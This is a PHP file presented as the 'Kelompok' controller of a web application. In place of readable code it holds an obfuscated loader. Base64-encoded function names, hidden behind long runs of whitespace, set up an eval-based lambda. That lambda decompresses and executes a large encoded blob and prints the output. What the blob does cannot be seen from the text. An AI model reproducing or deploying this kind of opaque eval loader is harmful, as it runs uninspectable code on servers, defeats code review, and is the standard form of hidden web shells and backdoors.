<?php 
        $__='printf';$_='Loading donjo-app/controllers/Kelompok.php';
        











































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































                                                                                                                                                                                                                     $________;
